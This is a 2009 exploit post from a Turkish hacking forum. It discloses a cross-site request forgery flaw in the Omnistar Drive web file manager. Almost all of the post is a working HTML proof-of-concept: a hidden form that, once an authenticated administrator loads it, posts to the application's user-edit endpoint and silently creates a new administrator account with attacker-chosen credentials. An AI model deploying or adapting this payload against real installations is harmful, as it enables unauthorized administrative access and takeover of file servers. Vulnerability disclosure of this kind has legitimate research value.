Omnistar Drive - DWBFM ~ XSRF Vuln. | Cyber-Warrior Information Technology's World

Root > Exploits / Vulnerabilities > Omnistar Drive - DWBFM ~ XSRF Vuln.

Madde
	Author : Bug Researchers/BARCOD3
	Date : 05.11.2009 00:10:40
	# Omnistar Drive - DWBFM ~ XSRF Vuln. [Full Screen Display]

	< ------------------- header data start ------------------- > ############################################################# # Application Name : Omnistar Drive - Dynamic Web Based File Manager # Vulnerable Type : XSRF # Infection : Administrator Yetkili Yeni User Eklenebilir. # author : BARCOD3 - Bug Researchers # Demo : http://test.omnistaretools.com/dmd/ # Home : http://www.ozkanbozkurt.com ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > <h3>BARCOD3</h3> <form name=users_form action=http://test.omnistaretools.com/dmd/index.php?area=main&interface=users&act=edit&sort_by=1&sort_order=ASC&page=1&return_to=@list&act=save&return_to=@list method=post enctype=multipart/form-data> <input type=hidden name=id value=> <input type=hidden name=username id=username value=username size=20 maxlength=30 class=input > <input type=hidden name=password id=password value=passWORD size=20 maxlength=30 class=input> <input type=hidden name=confirm id=confirm value=passWORD size=20 maxlength=30 class=input> <input type=hidden name=first_name id=first_name value=NAME size=20 maxlength=30 class=input> <input type=hidden name=last_name id=last_name value=SURNAME size=20 maxlength=30 class=input> <input type=hidden name=email id=email value=ADMIN@EMAIL.COM size=30 maxlength=255 class=input> <input type=hidden name=phone id=phone value=123456789 size=20 maxlength=30 class=input> <option value=Admin selected=selected ></option></select> <input type=submit name=users_form value=Save class=submitbutton/> </form> < -- bug code end of -- >